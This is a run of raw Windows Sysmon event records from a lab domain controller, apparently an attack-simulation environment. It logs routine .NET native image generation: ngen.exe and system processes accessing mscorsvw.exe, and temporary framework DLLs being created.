13:47:37.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9D02-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.827{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9D02-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.827{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9D02-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:37.765{59A5CD1D-9179-6005-9C02-00000000A301}4740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1284-0\System.Runtime.Serialization.Formatters.Soap.dll2021-01-18 13:47:37.765 10341000x80000000000000006799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.546{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9C02-00000000A301}4740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.546{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9C02-00000000A301}4740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:37.546{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9C02-00000000A301}4740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9B02-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.499{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9B02-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.499{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9B02-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:37.437{59A5CD1D-9179-6005-9A02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12f4-0\System.Runtime.DurableInstancing.dll2021-01-18 13:47:37.437 10341000x80000000000000006792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9A02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.140{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9A02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:37.140{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9A02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.077{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9902-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.062{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9902-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.062{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9902-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:36.999{59A5CD1D-9178-6005-9802-00000000A301}4848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12f0-0\System.Runtime.Caching.dll2021-01-18 13:47:36.999 10341000x80000000000000006813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:38.765{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917A-6005-A002-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:38.765{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917A-6005-A002-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:38.765{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917A-6005-A002-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:38.530{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917A-6005-9F02-00000000A301}3768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:38.515{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-917A-6005-9F02-00000000A301}3768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:38.515{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917A-6005-9F02-00000000A301}3768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:38.452{59A5CD1D-9179-6005-9E02-00000000A301}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1068-0\System.Security.dll2021-01-18 13:47:38.437 10341000x80000000000000006820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:39.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917B-6005-A202-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:39.515{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917B-6005-A202-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:39.515{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917B-6005-A202-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 